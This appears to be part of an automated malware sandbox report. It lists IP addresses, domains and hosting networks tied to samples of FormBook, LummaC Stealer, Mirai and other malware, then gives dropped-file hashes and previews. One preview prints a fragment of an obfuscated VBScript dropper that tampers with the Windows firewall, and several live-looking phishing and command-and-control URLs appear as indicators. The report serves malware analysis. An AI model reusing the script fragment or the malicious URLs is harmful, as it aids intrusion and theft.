                                                                                                    • assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/645a21a8-32ac-ef11-b8e8-6045bd0f229c
                                                                                                    162.159.200.123NordVPN #U2013 private secure VPN_v5.8.6_apkpure.com.apkGet hashmaliciousUnknownBrowse
                                                                                                      FileZilla_3.50.0_win32-setup.exeGet hashmaliciousUnknownBrowse
                                                                                                        FileZilla_3.52.2_win64_sponsored-setup.exeGet hashmaliciousUnknownBrowse
                                                                                                          FileZilla_3.52.2_win64_sponsored-setup.exeGet hashmaliciousUnknownBrowse
                                                                                                            68.66.226.116Bill Of Lading_MEDUVB935991.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.myrideguy.net/kgyd/
                                                                                                            AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.myrideguy.net/kgyd/
                                                                                                            Parfumens.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                            • www.arkgracechurch.com/qgq0/?ehzP8J=UhfgO53CoFS/baI5kBVtB1g8e8T/vciqKxKj6nf60DcK4G69QwsDs9mnRzbZxr8Ky8ZlNqHuRR+isOSUfNtlT6JPmq1blVIczw==&obSf_=6mSb4d
                                                                                                            Afklde.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                            • www.arkgracechurch.com/qgq0/?RiMDw1pV=UhfgO53CoFS/baI5kBVtB1g8e8T/vciqKxKj6nf60DcK4G69QwsDs9mnRzbZxr8Ky8ZlNqHuRR+isOSUfNtlT6JPmq1blVIczw==&Yx5=ef1G-xddsOpF
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            time.cloudflare.comdownload.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                            • 162.159.200.1
                                                                                                            b-0005.b-dc-msedge.netsF5nNt8usL.batGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.9.158
                                                                                                            oLY6JbNl9i.batGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.9.158
                                                                                                            9aTcxCmLgM.batGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.9.158
                                                                                                            4l5IFxl9t3.batGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.9.158
                                                                                                            B3N4x4meoJ.batGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.9.158
                                                                                                            Readme.lnk.download.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                            • 13.107.9.158
                                                                                                            098aPtSbmd.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                            • 13.107.9.158
                                                                                                            loader.ps1.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                            • 13.107.9.158
                                                                                                            file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                                                                                            • 13.107.9.158
                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                            • 13.107.9.158
                                                                                                            chrome.cloudflare-dns.commy2gf4tNEk.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 162.159.61.3
                                                                                                            my2gf4tNEk.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 172.64.41.3
                                                                                                            17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                            • 162.159.61.3
                                                                                                            sF5nNt8usL.batGet hashmaliciousUnknownBrowse
                                                                                                            • 162.159.61.3
                                                                                                            oLY6JbNl9i.batGet hashmaliciousUnknownBrowse
                                                                                                            • 162.159.61.3
                                                                                                            9aTcxCmLgM.batGet hashmaliciousUnknownBrowse
                                                                                                            • 172.64.41.3
                                                                                                            4l5IFxl9t3.batGet hashmaliciousUnknownBrowse
                                                                                                            • 162.159.61.3
                                                                                                            B3N4x4meoJ.batGet hashmaliciousUnknownBrowse
                                                                                                            • 172.64.41.3
                                                                                                            Readme.lnk.download.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                            • 172.64.41.3
                                                                                                            098aPtSbmd.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                            • 162.159.61.3
                                                                                                            fp2e7a.wpc.phicdn.netNew RFQ for PR-10453180.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 192.229.221.95
                                                                                                            New RFQ for PR-10453180.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 192.229.221.95
                                                                                                            Packed.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 192.229.221.95
                                                                                                            file.exeGet hashmaliciousStealcBrowse
                                                                                                            • 192.229.221.95
                                                                                                            vortex.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • 192.229.221.95
                                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                            • 192.229.221.95
                                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                            • 192.229.221.95
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 192.229.221.95
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 192.229.221.95
                                                                                                            luQ2wBh8q6.exeGet hashmaliciousXmrigBrowse
                                                                                                            • 192.229.221.95
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            A2HOSTINGUSNew Order.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 68.66.226.92
                                                                                                            sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 209.124.73.39
                                                                                                            sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 68.66.222.229
                                                                                                            loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 162.249.6.245
                                                                                                            file.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 68.66.226.92
                                                                                                            Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 68.66.226.92
                                                                                                            56ck70s0BI.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 66.198.240.15
                                                                                                            p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 66.198.240.15
                                                                                                            na.docGet hashmaliciousFormBookBrowse
                                                                                                            • 68.66.226.117
                                                                                                            http://mhmgc.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 85.187.128.10
                                                                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 172.67.165.166
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 104.21.16.9
                                                                                                            https://click.pstmrk.it/3s/bmxn8t84vg.gherapilta.shop%2F/ySDk/28y5AQ/AQ/e82f1f59-f734-42be-affb-895d81855fb4/1/pD2JDTOBnbGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                            • 104.26.13.205
                                                                                                            UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 172.67.156.195
                                                                                                            REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.67.152
                                                                                                            RFQ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                            • 104.26.12.205
                                                                                                            BACS190027-01.pdfGet hashmaliciousUnknownBrowse
                                                                                                            • 172.66.42.208
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 104.21.16.9
                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                            • 172.67.181.44
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 104.21.16.9
                                                                                                            SIDNNLdownload.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                            • 94.198.159.10
                                                                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 172.67.165.166
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 104.21.16.9
                                                                                                            https://click.pstmrk.it/3s/bmxn8t84vg.gherapilta.shop%2F/ySDk/28y5AQ/AQ/e82f1f59-f734-42be-affb-895d81855fb4/1/pD2JDTOBnbGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                            • 104.26.13.205
                                                                                                            UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 172.67.156.195
                                                                                                            REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.67.152
                                                                                                            RFQ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                            • 104.26.12.205
                                                                                                            BACS190027-01.pdfGet hashmaliciousUnknownBrowse
                                                                                                            • 172.66.42.208
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 104.21.16.9
                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                            • 172.67.181.44
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 104.21.16.9
                                                                                                            MICROSOFT-CORP-MSN-AS-BLOCKUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            https://click.pstmrk.it/3s/bmxn8t84vg.gherapilta.shop%2F/ySDk/28y5AQ/AQ/e82f1f59-f734-42be-affb-895d81855fb4/1/pD2JDTOBnbGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 13.104.186.142
                                                                                                            sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 72.154.201.82
                                                                                                            powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 143.68.137.119
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 22.150.44.90
                                                                                                            sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 22.32.66.107
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            28a2c9bd18a11de089ef85a160da29e4file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            New RFQ for PR-10453180.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            New RFQ for PR-10453180.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            https://click.pstmrk.it/3s/bmxn8t84vg.gherapilta.shop%2F/ySDk/28y5AQ/AQ/e82f1f59-f734-42be-affb-895d81855fb4/1/pD2JDTOBnbGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            3b5074b1b5d032e5620f69f9f700ff0escript.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • 93.95.216.175
                                                                                                            • 68.66.226.116
                                                                                                            mg.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • 93.95.216.175
                                                                                                            • 68.66.226.116
                                                                                                            mj.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 93.95.216.175
                                                                                                            • 68.66.226.116
                                                                                                            ap.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 93.95.216.175
                                                                                                            • 68.66.226.116
                                                                                                            cu.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 93.95.216.175
                                                                                                            • 68.66.226.116
                                                                                                            Scripts_Obfusque.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • 93.95.216.175
                                                                                                            • 68.66.226.116
                                                                                                            ni.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 93.95.216.175
                                                                                                            • 68.66.226.116
                                                                                                            REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 93.95.216.175
                                                                                                            • 68.66.226.116
                                                                                                            RFQ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                            • 93.95.216.175
                                                                                                            • 68.66.226.116
                                                                                                            31#U544a.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                            • 93.95.216.175
                                                                                                            • 68.66.226.116
                                                                                                            a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            • 52.113.195.132
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            • 52.113.195.132
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            • 52.113.195.132
                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                            • 13.107.246.63
                                                                                                            • 52.113.195.132
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            • 52.113.195.132
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            • 52.113.195.132
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            • 52.113.195.132
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            • 52.113.195.132
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            • 52.113.195.132
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            • 52.113.195.132
                                                                                                            37f463bf4616ecd445d4a1937da06e19REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 202.71.109.228
                                                                                                            comp#U00e1rtilhar080425-000800-66000544000.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 202.71.109.228
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 202.71.109.228
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 202.71.109.228
                                                                                                            comp#U00e1rtilhar080425-000800-66000544000.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 202.71.109.228
                                                                                                            venomderek.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                            • 202.71.109.228
                                                                                                            Ttok18.exeGet hashmaliciousVidarBrowse
                                                                                                            • 202.71.109.228
                                                                                                            jtkhikadjthsad.exeGet hashmaliciousVidarBrowse
                                                                                                            • 202.71.109.228
                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                            • 202.71.109.228
                                                                                                            No context
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1310720
                                                                                                            Entropy (8bit):0.7263290512863348
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0y:9JZj5MiKNnNhoxu7
                                                                                                            MD5:46D70526214FD694EC038611BFF6DAC2
                                                                                                            SHA1:08F53A5832905C360074B57B4926377B678BCCAC
                                                                                                            SHA-256:B8ED7E1336F049C3E100DAE5E04954C26AF2029CBC4305F0CA6B76C414CA0D3C
                                                                                                            SHA-512:AABAFAF33E8D642F2515A67220CC5849B51E22951D09B2A8091B3FA2DC05430C969F118501A93E48C89161A9131414459DC2EBB4CDF22D2BBDF7B44B2B46C00B
                                                                                                            Malicious:false
                                                                                                            Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:Extensible storage user DataBase, version 0x620, checksum 0xe0cce895, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1310720
                                                                                                            Entropy (8bit):0.7555983195839611
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:VSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:VazaSvGJzYj2UlmOlOL
                                                                                                            MD5:BBD10FDA998168ED5348AD7F527A6ADC
                                                                                                            SHA1:C872F1F368A3FC17E90947A586773721B2783B63
                                                                                                            SHA-256:D41BAB8F316264B6F0A4C355CF288658E6A113066B0A78D4115A89C44D626CE5
                                                                                                            SHA-512:671E50E84A257FB58F8D144133AE44A9B6F180DA761D43D7E3FBA38A721969A140EBE9F4673D6400E6E7B3FEBB04AC1F08F35467CF76705DCB61E4B2A841849F
                                                                                                            Malicious:false
                                                                                                            Preview:...... .......7.......X\...;...{......................0.e......!...{?.(&...|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{..................................kM:.(&...|'..................bS.(&...|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16384
                                                                                                            Entropy (8bit):0.07932284784443144
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:BJjyYe6Vcv0ENaAPaU1lCPRqv/YlluxmO+l/SNxOf:byzm2NDPaU6PyIgmOH
                                                                                                            MD5:C7A289B7DB566EB661A94C0AEFF81D83
                                                                                                            SHA1:23FF3C601147DBC697AC77A4CD16AFA550D83727
                                                                                                            SHA-256:9192DA0BAAA8D328C106FE961A6AB227937FC30F83407A66D0E49BB044879199
                                                                                                            SHA-512:C75B81B63D4706DCAB2D12843FC39ED0FD36E6093E99236FE322561802F95879346B8C3A796354E48383C6830421001DC4D8E4F64BA5CC596165F20582630B3E
                                                                                                            Malicious:false
                                                                                                            Preview:.,......................................;...{..(&...|...!...{?..........!...{?..!...{?..g...!...{?..................bS.(&...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):45982
                                                                                                            Entropy (8bit):5.1393254819055185
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:62ZSuxpkx/1EuE8BLsGmKuQu/G4bvYFbaxQ7N4x5fj5EObTsrNJD:62LmAGDuju3giNcN5d0JD
                                                                                                            MD5:D7782420DDDBD95FD746C9E59FB24523
                                                                                                            SHA1:481EDA9F024EEE0A42EEE72E423A8C88EEE219FE
                                                                                                            SHA-256:50277EBB2A5A87057AD1198B5432E76A8C0115C6DCB485CC1A2060E420F1B3BE
                                                                                                            SHA-512:EB98B922DC3CBAFF65F1528347F981260EC2E864DF2BA5CE9517F0231D0DC689FF57D9AD6B4287E8031BA1820E36FF5CF8B651E24DA16F16C07A9BADED21BB34
                                                                                                            Malicious:true
                                                                                                            Preview:..'Muldyrenes mura, rustvognes, precognizing; skytsengel,..'Synkronsvmningernes34, kjolesmmens, unoriginal tankelseste83..'Heterodoxies132! murga? sulphurless?....'Antipodistens104; imperfect....'Kryptograferedes. underpantene195; ghettoes; keps....'Brandfolkene autocarpic. amvis: vejrudsigters..'Rygerkupluerne, denitrated162. foresprgselstidspunkts; bundbrttets hovedkataloget.....''....'Udrugnings: coggledy aftjente brid: realskolens...Set Evakuerede = CreateObject("HNetCfg.FwMgr")..'Trotskisme139 harpiksers belagde....'Subskribenter? overhostility..'Ensretterne133 vaesentlige..Set Tronhimmels = Evakuerede.LocalPolicy.CurrentProfile..'Hydride, misogamist: accommodate....'Lgernes; kltringestregers..'glideflugten doemmer;..Set Komparativ = Tronhimmels.ICMPSettings..'Preplacing? anprist monostomum....'Cognates konsul deiktiskes; mickey....'Lnds: reappropriate! defibrillatorens. indesluttende amylosis;....'Sinkens57 kalkylerne; lediggngerne4 caravanernes68..'Clanswomen; ligesidet,..'Natio
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:Microsoft Excel 2007+
                                                                                                            Category:modified
                                                                                                            Size (bytes):8102
                                                                                                            Entropy (8bit):6.568397432820325
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:wc8mVrb3UH8QOTLQxizT3W7+p+1iIKoA7Yp4Ns:wc313rDQITMaUARNs
                                                                                                            MD5:76867B70E4722699C523B3DD3EB4524E
                                                                                                            SHA1:2F9C1F14FC0A5CF128D5C98611CA348FFA9F497F
                                                                                                            SHA-256:8725322D24CA83BE5BAB62E530EAD8B32D1EB1FF9F671A5EC0225021D5D90FA3
                                                                                                            SHA-512:2563FB531706A330C63A6E99AF3A2EACF3B3E891D9BD554F230BFC816FBFF7A4436FE15769EA9E89C40053D7F74C4C2C88C2EA5FBAA339171D8974C6122CACB5
                                                                                                            Malicious:true
                                                                                                            Preview:PK..........!.b.h^...........[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J.@.5...*Q>...c[.ii.....B..j7....{2..h.nm....R.....U^.7/...%....rZY...@1.__.f...q..R4D.AJ..h..>....V.....Z.9....NV..8.......ji){^..-I.."{..v^.P!XS)bR.r..K.s(.3.`c..0..........7.M4......Z.k+.|\|z.(...P..6.h_-[.@.!....Pk....2n.}.?..L... ..%......d....dN."m,..DO97*.~...8.O.c.|n.....E........B...!$}.....;{...[.....2........PK..........!..U0#....L......._rels/.rels ...(...................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):165
                                                                                                            Entropy (8bit):1.610853976637159
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:iXFQLjLlAWFd:97
                                                                                                            MD5:CA2C2DB316A89F044206082EEB3A366E
                                                                                                            SHA1:B1B7DFF94B991B26093AA29BF3793DDE245412E1
                                                                                                            SHA-256:12393F1035745AD02C149920E37AFFE459CD0448A2AFEE25C1FABA8060758FF7
                                                                                                            SHA-512:66BC8C779431737A3FA00AF7697C299BC473B6FD22D48914986821DA7C0AB90554D32F7F2B471EAB5410F9C0DE7E076F4D6DEDDCCE1948818F7781DAE9EDEBE7
                                                                                                            Malicious:false
                                                                                                            Preview:.user ..e.n.g.i.n.e.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:modified
                                                                                                            Size (bytes):11608
                                                                                                            Entropy (8bit):4.8908305915084105
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                                                                                            MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                                                                                            SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                                                                                            SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                                                                                            SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                                                                                            Malicious:false
                                                                                                            Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):64
                                                                                                            Entropy (8bit):1.1940658735648508
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Nlllul3nqth:NllUa
                                                                                                            MD5:851531B4FD612B0BC7891B3F401A478F
                                                                                                            SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                                                            SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                                                            SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                                                            Malicious:false
                                                                                                            Preview:@...e.................................&..............@..........
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
